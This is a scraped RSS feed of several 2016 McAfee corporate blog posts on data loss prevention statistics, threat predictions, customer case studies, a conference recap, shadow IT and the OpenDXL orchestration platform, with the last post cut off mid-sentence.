We know that that cybersecurity threats are on the rise, so where are companies focusing their efforts? The most likely exfiltration methods are clearly on their radar. Of all companies, 70% monitor for suspicious emails and 50% for inappropriate access to sensitive data. But these numbers should be higher given the prominence of these threats. From the other side, over 25% of companies don’t monitor access to employee or customer data, and only 37% monitor for both. The reality is, holistic monitoring still isn’t reality for most.

Truthfully speaking, many organizations face difficulty with configuring security solutions. In fact, for 65% of teams that don’t understand how the technology works, personally identifiable information isn’t being watched! That’s certainly a concern given the rising demand for such data.

So where should organizations focus their efforts? Certain business events invite greater risk, and it’s important to identify these. New product launches and strategic planning contain more sensitive data. It’s no surprise incidents are related. But companies have tuned into that fact, and the rise of related incidents has been relatively minor. However, other events are now driving more and more data loss. Quarterly reports and other financial disclosures are prime targets. And the use of social media by employees is also a driver—unique in its ability to generate sources for cyber-crooks. Clearly, the industry needs a hard day’s focus.

Treat You Better, Monitoring Solutions

In assessing the adequacy of security defenses, false negatives are a key signal. We gain insight by considering, among organizations that use data loss prevention solutions, how many breaches still occur. This question tells us whether good tools and best practices are actually making a difference, or if organizations are naive and unaware of occurring incidents.

To answer that question, let’s first recall a fact from the first blog. Remember how an increasing percentage of breaches are being discovered by external sources? They have more detection methods, and can generate a composite view of victims’ data loss. And by external measures, among those who don’t know how monitoring technology works, 23% are unsure if they suffer data loss. Shockingly, the remaining 77% of this group believe they’re not suffering any data loss. Such a bold belief is dangerous. Numbers clearly show incidents are on the rise — there seems to be a lack of proper monitoring in many organizations.

Walk On the Secure Side

Before we getting into our final suggestions, let’s review the state of the industry. To start, it’s noticeable that the gap between data loss and its discovery is widening—especially among internal teams. Additionally, while industries with payment information have been most targeted in the past, their loss prevention systems are maturing. Demand is now increasing for personally identifiable information, health data, and intellectual property. And among data types, unstructured formats are particularly difficult to monitor with regular expressions. This makes simple configurations risky. Physical media also shouldn’t be underestimated, accounting for the second highest number of incidents. What’s the takeaway? All things considered, visibility is becoming increasingly crucial.

But there’s good news. Organizations can employ a host of tactics to bolster their defenses. The process should start with business requirements: identifying which data is most sensitive. Once that’s been done, server and endpoint scanning technologies can monitor for relevant information. Teams can further use classification tools, security notifications, and value recognition to maintain awareness. And the movement of crucial data can be flagged when not part of a normal business process. With justification screens, users can also better understand what is acceptable and what is not. Finally, after assigning owners and separating duties, policies can block suspicious data transfers.

By using an intelligent plan for data loss prevention, organizations can truly be resilient in the face of increasing threats. Surely, that will have cybercriminals singing to a different tune.

That’s a wrap for this blog series! To stay informed, follow @McAfee and @McAfee_Business for the latest. And as always, feel free to tweet any thoughts or questions with the hashtag #WhoLetTheDataOut.

The post Who Let the Data Out? Who, Who, Who, Who? (Part 3 of 3) appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/data-security/who-let-the-data-out-who-who-who-who/feed/ 0
‘McAfee Labs 2017 Threats Predictions’ Report Zeroes In on Cloud and IoT Threats https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-2017-threats-predictions-report-zeroes-cloud-iot-threats/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-2017-threats-predictions-report-zeroes-cloud-iot-threats/#respond Tue, 29 Nov 2016 05:04:32 +0000 https://securingtomorrow.mcafee.com/?p=66495 This blog post was written by Vincent Weafer. In the McAfee Labs 2017 Threats Predictions report, published today, we cover a lot of ground but focus particularly on two areas that will impact IT security for years to come: threats to the cloud and the Internet of Things. The report kicks off with a big-picture […]

The post ‘McAfee Labs 2017 Threats Predictions’ Report Zeroes In on Cloud and IoT Threats appeared first on McAfee Blogs.

]]>
This blog post was written by Vincent Weafer.

In the McAfee Labs 2017 Threats Predictions report, published today, we cover a lot of ground but focus particularly on two areas that will impact IT security for years to come: threats to the cloud and the Internet of Things.

The report kicks off with a big-picture examination of difficult-to-solve problems in cyber security and the security industry’s early efforts to solve them. These perplexing problems require foundational research, new classes of products, heavy development time and effort, and a sustained focus, often by multiple industry participants working together. In this article, we discuss six of those challenges.

Our next story looks at cloud threats and breaches, laws and borders, and vendor responses. Eleven McAfee thought leaders collaborated to produce this analysis of cloud threats and expected legal and industry responses during the next two to four years. What threats and breaches do we expect to see? How will geopolitical issues, legislation, and regulatory actions affect this environment? And what responses do we anticipate from cloud service providers and security vendors?

Our final long-lens story is about threats to the Internet of Things. Using the same approach as the cloud threats story, 10 McAfee thought leaders offer predictions about threats and breaches, laws and borders, and vendor responses during the next two to four years.

Following these in-depth stories, we make specific predictions about threats activity in 2017. Our predictions cover 14 threat types, including ransomware, vulnerabilities of all kinds, the use of threat intelligence to improve defenses, and attacks on mobile devices.

Among other things, we:

  • Predict that ransomware will peak in the middle of next year but then begin to recede.
  • Discuss why threat intelligence sharing will see major advancements in 2017.
  • Explain why machine learning will be used to enhance socially engineered attacks.
  • Detail why vulnerabilities in several of the most common apps will continue to drop in 2017.
  • Examine why there will be even more cooperation between security vendors and law enforcement agencies to take down cybercriminals.

Looking back at last year’s report, many of our threat predictions came true, some did not, and other threats were completely unanticipated. Very few could have predicted, for instance, that insecure Linux devices, including online consumer devices such as remote cameras and home routers, would be organized into a giant botnet to perform a major DDoS attack on an Internet infrastructure provider. But it happened!

This year’s report makes some bold predictions. I expect that our batting average will be about the same as last year and that an unexpected threat will come out of the blue, making major headlines. Such is the nature of the predictions business.

Read the McAfee Labs 2017 Threats Predictions report.

The post ‘McAfee Labs 2017 Threats Predictions’ Report Zeroes In on Cloud and IoT Threats appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-2017-threats-predictions-report-zeroes-cloud-iot-threats/feed/ 0
How One Government Agency Modernized Their Strategy with a McAfee Connected System https://securingtomorrow.mcafee.com/business/one-government-agency-modernized-strategy-mcafee-connected-system/ https://securingtomorrow.mcafee.com/business/one-government-agency-modernized-strategy-mcafee-connected-system/#respond Wed, 23 Nov 2016 18:12:17 +0000 https://securingtomorrow.mcafee.com/?p=66542 Tasked with collecting and processing data for the country’s census and other sociodemographic surveys, one South American government agency needed to be a well-oiled machine. Instead, they were caught in the past, stuck with an IT ecosystem of mixed solutions and an outdated anti-virus protection, ridden with highly publicized malware attacks. That was until 2012, […]

The post How One Government Agency Modernized Their Strategy with a McAfee Connected System appeared first on McAfee Blogs.

]]>
Tasked with collecting and processing data for the country’s census and other sociodemographic surveys, one South American government agency needed to be a well-oiled machine. Instead, they were caught in the past, stuck with an IT ecosystem of mixed solutions and an outdated anti-virus protection, ridden with highly publicized malware attacks.

That was until 2012, at least, when their government mandated a modernization of all federal resources, including their security infrastructure. The statistics agency quickly realized this mandate was the perfect opportunity to identify existing gaps in their current processes and create a more integrated security system.

To achieve this system, the agency started by evaluating their current problems and needs, as their network security manager stated, “we were looking for much more than antivirus; we also needed to address policy enforcement, security of servers and storage, and a lack of visibility into our overall security posture”. In order to both address these issues and attain a more desired security posture, “we needed a security partner that could sustain and support us proactively as our needs evolved,” he added.

That partner ended up being Mcafee, as the agency felt like they could not only depend on McAfee products for support, but also to create an integrated suite that would help the agency achieve their dreams of modernization.

rcb-pull-quote

To begin achieving this dream, the agency started by selecting a group of McAfee products that would plug holes and protect all areas. These solutions included: McAfee Endpoint Protection — Enterprise, McAfee Network Security Platform, McAfee Vulnerability Manager, McAfee Enterprise Security Manager, McAfee Data Center Security Suite for Databases, and McAfee Asset Manager. And to the organize all of these solutions, the agency deployed the McAfee ePolicy Orchestrator as well.

All tied together underneath the McAfee ePO console, this newly connected system operates by sharing data and feeding information throughout tools to create a comprehensive threat resolution. Because of these interconnected capabilities, all of the agency’s bases are covered. For instance, the McAfee Enterprise Security Manager (SIEM tool) continually gathers data at highly sensitive information points, so that the agency can then use it to fine-tune monitoring and therefore proactively stop threats. And since the agency has a mixed data environment with many databases varying in degree of vulnerability, the McAfee Data Center Security Suite works well for their system since it stops all exploits no matter where they are and without the need to apply large patches.

Since deploying this integrated system, the agency has not only experienced a decrease in malware attacks, but also an increase in effectiveness due to visibility. “Now, with McAfee, we know what’s happening on the network, and where and when,” the systems director says, “with the heightened visibility of McAfee tools, we can be proactive and shut down threats immediately before they have a chance to do damage.” In addition to visibility comes adaptability as well, as the automation of processes and integration of tools gives the South American agency the control to adapt their process to the ever-changing security landscape. Being adaptable has also had a positive effect on the agency’s long term confidence, as the systems director states, “with McAfee as our long-term security partner, we have the confidence we need to ensure business continuity and deliver a security platform that we can continue to build on into the future.”

To read the full case study, click here and get your questions answered by tweeting @McAfee_Business.

The post How One Government Agency Modernized Their Strategy with a McAfee Connected System appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/one-government-agency-modernized-strategy-mcafee-connected-system/feed/ 0
Together is Power—Recapping FOCUS 16! https://securingtomorrow.mcafee.com/business/together-power-recapping-focus-16/ https://securingtomorrow.mcafee.com/business/together-power-recapping-focus-16/#respond Thu, 17 Nov 2016 15:30:59 +0000 https://securingtomorrow.mcafee.com/?p=65320 The 9th Annual McAfee FOCUS Conference kicked off the first week of November with incredible keynote speakers, inspiring breakout sessions and turbo talks, and a huge announcement! To the delight and surprise of attendees, SVP and GM Chris Young unveiled a new McAfee product brand. And keynote speakers Ashton Kutcher and Ted Koppel spoke about the […]

The post Together is Power—Recapping FOCUS 16! appeared first on McAfee Blogs.

]]>
The 9th Annual McAfee FOCUS Conference kicked off the first week of November with incredible keynote speakers, inspiring breakout sessions and turbo talks, and a huge announcement! To the delight and surprise of attendees, SVP and GM Chris Young unveiled a new McAfee product brand. And keynote speakers Ashton Kutcher and Ted Koppel spoke about the future of cybersecurity and the defense needed to combat against threats. But that was only the beginning.

OpenDXL Launch

One of the most talked-about moments from FOCUS 16, was when Chris Young unveiled the OpenDXL Initiative. OpenDXL provides the industry with concrete means of disrupting cyberattackers’ advantage by allowing developers to replace multiple 1:1 integrations over proprietary APIs.

CTO, Steve Grobman used his keynote to walk the audience through an example of the new OpenDXL orchestration model. Later, attendees were able to experience OpenDXL themselves at the FOCUS demo station. Twitter overflowed with excitement! Missed the buzz? See what the Open DXL Initiative could mean to your security architecture by checking out the latest data sheet.

A Race for Trust in the Cybersecurity War

Need inspiration for your next book club choice? Consider, “The Second Economy,” a new book co-authored by McAfee’s own Steve Grobman and Allison Cerra.  While you may be thinking that a book focused on the ins and outs of cybersecurity is meant for technologists and cybersecurity executives, The Second Economy was written to start a dialogue between cybersecurity professionals and their non-technical peers, through education, insight and collaboration. FOCUS 16 attendees each received their own copy at the event and you can get one here <link>

It’s all about SIEM

One of the hottest topics at FOCUS was security information and event management (SIEM). McAfee is proud to be a leader in the Gartner Magic Quadrant for SIEM, and was excited to share our plans for strengthening threat detection, prioritization, and incident management.

We held several talks related to SIEM, focusing on how to better leverage the McAfee® SIEM solution for optimized threat intelligence and incidence response in today’s threat environment.

To detail strengthened SIEM, we shared use cases and best practices for improving security posture from customers who witnessed the benefits firsthand. We even shared a livestream of the Group Meeting on Product Management and Customer Council, so that followers at home could glean findings.

Gaga for the Goo Goo Dolls

FOCUS isn’t just about strengthening security—it’s about fun too! It only felt right to close out the event with a BANG, Vegas style. During our raging final night event, we had none other than the Goo Goo Dolls perform at the Aria Hotel. The room was jumping when the famed band played hits like “Iris” and “Slide”.

See You Next Year!

A huge thank you to everyone who made this year’s FOCUS Conference a massive success. From amazing keynotes, a new brand unveiling, The Second Economy, and to some amazing product launches— we can truly say this year’s FOCUS Conference was the best one ever. Eager for more? Join us next year from October 17th– October 19th at the Venetian in Las Vegas, at a discounted rate. To keep up-to-date on all the latest FOCUS related information, make sure to follow our FOCUS Showcase page on LinkedIn and follow us on Twitter @McAfee and @McAfee_Business.

The post Together is Power—Recapping FOCUS 16! appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/together-power-recapping-focus-16/feed/ 0
How McAfee Made a Manufacturing Company’s Interconnected Security Dream a Reality https://securingtomorrow.mcafee.com/business/manufacturing-company-interconnected-security-dream/ Thu, 10 Nov 2016 17:33:52 +0000 https://securingtomorrow.mcafee.com/?p=65209 Thomas Langer, Head of IT security for the German-based industrial packaging group MAUSER, needed a comprehensive security solution to protect his company’s intricate infrastructure. His one requirement: the solution must help them to share threat intelligence among all endpoints and networks, across 80 locations worldwide. That same threat intelligence would then be automatically analyzed and […]

The post How McAfee Made a Manufacturing Company’s Interconnected Security Dream a Reality appeared first on McAfee Blogs.

]]>
Thomas Langer, Head of IT security for the German-based industrial packaging group MAUSER, needed a comprehensive security solution to protect his company’s intricate infrastructure. His one requirement: the solution must help them to share threat intelligence among all endpoints and networks, across 80 locations worldwide. That same threat intelligence would then be automatically analyzed and acted upon as needed so that employees wouldn’t have to intervene much. He also hoped that same system could be able to learn from past events to create a smarter defense for the future.

That’s where McAfee came in. After surveying the market, Langer decided that McAfee was the only company that could meet MAUSER’s needs. He stated, “McAfee was the only company that could help us optimize our medium-range and long-term strategy.” He also claimed that McAfee “could deliver on its integrated security promise and even define security standards. No other vendor is in the same position”.

Soon enough, Langer began deciding between McAfee solutions to identify the best collective of products that could achieve an integrated security model—one that combines data, workflows, and management dashboards into a centrally managed environment. Langer ultimately settled on a combination of four solutions: McAfee Enterprise Security Manager, McAfee Advanced Threat Defense appliances, McAfee Threat Intelligence Exchange, and McAfee Application Data Monitoring.

Since MAUSER’s integrated security framework had already operated under McAfee endpoint protection solutions, bringing in the additional technology was only going to take the company’s threat defense to a whole new level.

A new level that, once properly conveyed to executives, drove almost immediate C-level support. Once the CFO heard how critical the products were to long-term strategy, and to current legal and compliance requirements, he was on board. The CIO, in turn, just needed to take a visit to McAfee EBC (Executive Briefing Center) in Amsterdam to learn how the interconnected system worked and left that same day fully in support of the technology.

With everyone on board, MAUSER began to integrate the solutions. They soon saw how it was easier to detect the most difficult, targeted types of attacks because of McAfee Advanced Threat Defense. Those attacks were then detected faster and with more visibility because of McAfee Enterprise Security Manager. Collecting and sharing all of this threat information, the McAfee Threat Intelligence Exchange then contextualizes this information and makes protective decisions in real time.

Another one of Langer’s favorite aspects of their open and connected McAfee system is automated incident response, which immediately disconnects any computer that is infected so the malware can’t spread. He says, “If the McAfee system detects something suspicious, I am very comfortable with it taking countermeasures automatically”.

Langer’s trust in the McAfee system was only reaffirmed when the results started coming in. “The time to detect and analyze threats of all kinds has shrunk tremendously and faster detection and analysis equates to a faster response” stated Langer. In fact, just 12 hours after going live with the integrated program, the system thwarted a serious attack that came in the form of an advanced malicious software. As soon as one laptop was contaminated with malware, the entire system jumped into action and their firewall recognized it and blocked it. “That incident showed us just how powerful the McAfee system is. We hate to think what would have happened had it not been implemented” Langer reflected.

In addition to saving MAUSER from attacks, the integrated system saves them time and energy as well. Since MAUSER has fewer security instances to investigate and a network that runs much more smoothly, their valuable time and energy is preserved.

bmc-case-study-1-1

To read the full case study, click here and get your questions answered by tweeting @McAfee_Business.

The post How McAfee Made a Manufacturing Company’s Interconnected Security Dream a Reality appeared first on McAfee Blogs.

]]>
Out of the Shadows: How to Bring Cloud Usage into the Light https://securingtomorrow.mcafee.com/business/cloud-security/shadows-bring-cloud-usage-light/ https://securingtomorrow.mcafee.com/business/cloud-security/shadows-bring-cloud-usage-light/#respond Tue, 08 Nov 2016 00:11:59 +0000 https://securingtomorrow.mcafee.com/?p=64291 This blog post was written by Patty Hatter. On any given day – with a quick spot-check – you’ll probably find that up to half of your company’s IT usage is basically hidden in the shadows of various business units. Marketing, finance, sales, human resources, and engineering are using file sharing services with customers, online […]

The post Out of the Shadows: How to Bring Cloud Usage into the Light appeared first on McAfee Blogs.

]]>
This blog post was written by Patty Hatter.

On any given day – with a quick spot-check – you’ll probably find that up to half of your company’s IT usage is basically hidden in the shadows of various business units. Marketing, finance, sales, human resources, and engineering are using file sharing services with customers, online collaboration tools with contractors and suppliers, and multiple SaaS solutions in addition to on-demand IaaS compute resources. Business areas oftentimes make swift decisions to keep their business operations running. As departments look for the best way to do their jobs and efficiently meet their business objectives, they opt for immediate solutions that often operate outside of corporate IT security policies and guidelines.

When it comes to business units – if you haven’t created an environment of trust – IT can quickly rank the least-loved group in a company. Worse yet, you could be seen as the department of prevention. While the business units are looking for new apps or elastic compute to increase productivity, IT is looking for efficiency, security, and compliance. Departments will side step IT if they believe the needed services won’t be available in time, or if the value proposition is weak.

In today’s cyberattack-riddled environments, “shadow IT” is undeniably risky. To ensure optimum safety, you’ve got to bring IT into the light. Multiple file sharing services have been breached, and credential theft can potentially allow an adversary into any of these services. You’ve got to have IT security experts involved in the selection of these cloud services or construction of private clouds. Period.

Soon after joining McAfee, I took on the added responsibility as CIO in addition to my role as VP of operations. No easy task – but I saw what the business functions needed to move forward, and I knew that IT had to be at the center of it, as a “reliable and trustworthy business partner.” My first objective was the transformation of IT into a more collaborative and positive role. There was a lot of shadow IT at the company then and a pervasive attitude of mistrust.

Transformation is an issue of trust. If other groups within the company felt they could not work with IT, we needed to counter that perception. We started with the business functions, which tend to have simpler IT needs, such as marketing and sales, and moved up to the big challenge of winning over engineering.

Start with forgiveness

“It’s easier to ask for forgiveness than permission” is something you often hear when groups are discussing a shadow IT project. I suggest approaching with an attitude of forgiveness and understanding – to rebuild what are often strained relationships. Recent hacks and breaches will make this easier. You may have to remind your colleagues that their data is better off under the IT security tent if something bad happens, and that you will be their partner in this. Having to face the board of directors because the new marketing strategy, product designs, or customer data was stolen is a scenario that should convince most managers to at least participate in talks.

Build trust with transparency

You still need to address the agility and cost issues that are the root cause of shadow IT, or the problem will persist. We put together an effective governance model that enabled a high level of transparency on what was and wasn’t working. IT doesn’t always think the same way as the other groups, and clear communication and governance were important steps to understanding the business unit’s needs and building trust. Developing the cost models together, our business units realized that they got a much better financial deal when working with IT. Moreover, they were operating within the boundaries of corporate security policies.

Set up a cloud architecture team

Tackling shadow IT from the engineering department brought new issues to light. With their own technical resources, “do it yourself” is often the default path for engineering. This not only results in a gap between IT and engineering, but different development stacks and services between the various product teams, which makes it costly and difficult to scale. We set up an engineering/IT cloud architecture team to build a consistent set of use cases and identify big bets that we could put our joint resources on, so we could move forward quickly. It took time to get this started, but we were playing the long game here, working to bridge these two groups, not trying for a quick takeover.

In the end, the teaming approach among IT, the business functions, and engineering enabled us to develop a total view of business needs and a joint architectural approach. We had full visibility of the on-prem and SaaS managed infrastructure and capabilities that allowed us to get the results we needed like rapid achievement of new capabilities and an improved cost model.

The post Out of the Shadows: How to Bring Cloud Usage into the Light appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/shadows-bring-cloud-usage-light/feed/ 0
Shiny Meets Sustainable: OpenDXL as an Orchestration Platform https://securingtomorrow.mcafee.com/business/shiny-meets-sustainable-opendxl-orchestration-platform/ https://securingtomorrow.mcafee.com/business/shiny-meets-sustainable-opendxl-orchestration-platform/#respond Thu, 03 Nov 2016 20:38:35 +0000 https://securingtomorrow.mcafee.com/?p=64168 This blog was written by Barbara Kay. Every now and then I get into a debate about what constitutes a platform. To me, it means connecting functions and data easily and as directly as possible, balancing speed and simplicity and safety. While it’s nice to present this as an architectural stack, with open interfaces at […]

The post Shiny Meets Sustainable: OpenDXL as an Orchestration Platform appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

Every now and then I get into a debate about what constitutes a platform. To me, it means connecting functions and data easily and as directly as possible, balancing speed and simplicity and safety. While it’s nice to present this as an architectural stack, with open interfaces at the edges, modern software development is more complex. Programmable interfaces, both open and proprietary, sprout around each layer and module as new ideas, “shiny objects,” are brought to market in an increasingly sophisticated, crowded, yet still rapidly evolving, security landscape.

For us to overcome the vulnerabilities of the Second Economy, security teams (and I include endpoint, data center, and network operations in this responsibility) need the ability to adopt “narrow mission” technologies quickly, while those tools remain effective against the attacks or obstacles they were designed to overcome. However, a sustainable security operations function depends on integrating these tools with operational systems, management processes, and people resources. Not only do you want the ability to integrate (think APIs), you want to integrate with minimum effort and cost, so that monitoring, workflows, policies, and reporting can continue without disruption or reinvention. Further, you would prefer to avoid the maintenance cost and dysfunction associated with change on either side of each integration. (See my previous blog for more on the challenge of change.)

The bridging of shiny and sustainable is why the OpenDXL initiative is strategic for McAfee and the industry as a whole. Through a common programming interface and an open orchestration model, security teams can connect shiny objects and operational systems. This connection keeps the focus on critical success factors in the second economy:

  1. Trust: Achieve the visibility and closed loop feedback to enable “trust” amongst the team members who must collaborate across threat operations and IT operations.
  2. Treasure: Gain sufficient transparency about risk and change to understand the impact of events on their “treasure” (corporate assets).
  3. Time: Unified (integrated, automated, and orchestrated) processes drive down the “time to” metrics that are critical to manage as the white hats fight the clock against the black hats.

At FOCUS 2016 today, Steve Grobman demonstrated an example of the new OpenDXL orchestration model—lightweight, effective and oh-so-fast. Leveraging the open source DXL Python client now available on github.com/openDXL, we built a proof of concept for McAfee Security Innovation Alliance partners Check Point, HP Aruba, and Rapid7 in conjunction with the new McAfee Active Response Endpoint Detection and Response (EDR) product.

In this closed loop threat defense workflow